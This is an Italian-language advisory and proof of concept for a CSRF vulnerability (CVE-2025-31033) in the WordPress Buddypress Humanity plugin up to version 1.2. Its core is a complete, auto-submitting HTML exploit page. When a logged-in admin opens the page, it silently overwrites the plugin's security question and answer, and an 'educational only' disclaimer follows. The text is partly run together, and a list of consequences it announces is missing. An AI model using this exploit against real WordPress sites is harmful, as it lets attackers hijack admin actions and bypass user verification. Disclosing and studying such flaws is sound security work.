
WordPress Buddypress Humanity Plugin <= 1.2 è vulnerabile a Cross Site Request Forgery (CSRF)
Il plugin Buddypress Humanity per WordPress (versione <= 1.2) è vulnerabile a Cross-Site Request Forgery (CSRF).
Questa vulnerabilità consente a un attaccante di costringere un utente con privilegi più elevati (es. admin) a modificare inconsapevolmente le impostazioni del plugin (come la domanda di sicurezza e la risposta), aggirando la logica di verifica dell'utente.
bph-settings (solo admin)CVE-2025-31033Se sfruttata con successo, questa vulnerabilità consente agli attaccanti di:
buddypress-humanity<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
<form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
<input type="hidden" name="bph_option[bph_title]" value="Nxploited">
<input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
<input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
<input type="hidden" name="bph_submit" value="1">
</form>
</body>
</html>
☠️ Quando questa pagina viene aperta da un admin autenticato, modifica silenziosamente le impostazioni del plugin.
Questa prova di concetto è solo a scopo educativo.
Usala in modo responsabile e non testare su sistemi che non possiedi.
L'autore non è responsabile per qualsiasi uso improprio o danno causato.
Nxploited | Khaled Alenazi